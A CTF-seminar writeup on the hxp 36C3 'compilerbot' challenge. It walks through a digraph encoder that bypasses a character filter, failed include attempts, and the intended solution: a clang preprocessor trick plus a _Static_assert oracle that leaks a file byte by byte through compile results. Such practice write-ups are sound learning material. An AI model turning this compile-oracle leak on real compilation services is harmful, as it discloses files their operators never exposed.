chgue add more writeups

[pub/jan/ctf-seminar.git] / writeups / chgue / hxp36c3.md

# Retrospective
Sadly, I didn't have that much time to play the CTF. Therefore, after trying some challenges I decided to stick to one challenge even if I was making no useful progress at all since jumping between challenges seemed even less useful. The challenge I tried was very interesting but sadly I was stuck at one step and did not find anything useful.

**Time spent:** 7 hours

## compilerbot (misc) (unsolved)
### Overview
The following python service was accessible via a tcp

```python
#!/usr/bin/env python3

import base64
import subprocess

code = base64.b64decode(input('> ')).decode()
code = 'int main(void) {' + code.translate(str.maketrans('', '', '{#}')) + '}'

result = subprocess.run(['/usr/bin/clang', '-x', 'c', '-std=c11', '-Wall',
                         '-Wextra', '-Werror', '-Wmain', '-Wfatal-errors',
                         '-o', '/dev/null', '-'], input=code.encode(),
                        stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                        timeout=15.0)

print(result.stdout)
if result.returncode == 0 and result.stdout.strip() == b'':
    print('OK')
else:
    print('Not OK')
```

Basically, the program takes an base64 input, decodes it, and inserts it into the `main` function of a barebones C template. Additionally, it uses the functions `translate` and `maketrans`. `translate` applies a translation table to a string. `maketrans` takes 3 inputs and creates a translation table. E.g. `maketrans('abc', '123', 'x')` turns the string `abcXcba` to `123321`. That is it maps the characters from the first input to the second one character by character. All characters in the third input are removed. In the case of the given service that means that `{`, `}` and `#` are removed from the input.

If the compilation is successful, the service outputs `OK`. Otherwise, it outputs `Not OK`. The compiled code is never run and immediately discarded into `/dev/null`.

### Attempted solutions
Looking at the code, the inputs are passed to `clang` correctly and no additional flags or anything else could be passed. Therefore, the exploit is presumably to bypass the input escaping and turning compilation into an oracle for a local file (i.e. the flag file).

The translation can easily be circumvented using digraphs. I created a script that reads a file, escapes the blacklisted characters using digraphs and encodes the results in base64. Additionally, a newline is prepended and `return 0;` appended since otherwise the compiler will complain.
```python
import sys
import base64
with open(sys.argv[1], "r") as f:
    data = f.read().replace("{", "<%").replace("}", "%>").replace("#", "%:")
    data = "\n" + data + "\nreturn 0;"
    print(base64.b64encode(data.encode()).decode())
```

My first idea was to `#include "flag"` and storing it in a char array. However, `#include` treats the file contents as C code and not as a string! Therefore, this is not easily possible. Stackoverflow sadly offers no solution either https://stackoverflow.com/questions/1246301/c-c-can-you-include-a-file-into-a-string-literal. To be able to include the file directly, it would have to be of the form `MACRONAME(the_flag_goes_here)`. Then one could define the macro `#define MACRONAME(x) #x`. This macro turns the input into a string literal since `#x` is some sort of macro builtin. However, the flag file has the format `hxp{the_flag_goes_here}` so this approach does not seem viable.

It is however possible to `#define hxp <whatever>`. So I tried 
```C
#define hxp enum t
#include "./flag"
;
```
This essentially creates an enum with the flag as the only element. This worked on my local machine with a fake flag such as the one above. However, on the real service it returned an error so the flag included some illegal characters.Furthermore, I don't know how this could be exploited further.

Meanwhile, I looked at [`clang` extensions](https://clang.llvm.org/docs/LanguageExtensions.html) since some might be useful and differ from the ubiquitous `gcc`. I found nothing useful that could help with including the flag. However, I found [`_Static_assert()`](https://clang.llvm.org/docs/LanguageExtensions.html#c11-static-assert) which would probably be a handy oracle function if the flag could somehow be included. Sadly, I never managed to include the flag.

I spent the rest of the time reading C documentation and tried to get something working locally. However, I could not find a way to include the flag.

### Solution (as per other writeups)
The [intended solution](https://ctftime.org/writeup/17952) provided by hxp used the following peculiarity of `clang`: 
```C
#define _str(x) #x
#define str(x) _str(x)
#define hxp str(
#include "flag"
)
```
This starts the macro inside the included file but closes the bracket in our file. Somehow, `clang` accepts this and parses the contents (i.e. the flag) as a string (`gcc` would not do that).

Since they can include the flag they use this pattern to find the flag by using a binary search
```C
static const char thing[str(...)[0]];
_Static_assert(sizeof(thing) == '{', "...");
```

Other solutions used some weird inline assembly and `.incbin` interactions to yield the flag. However, the above is the intended solution according to hxp.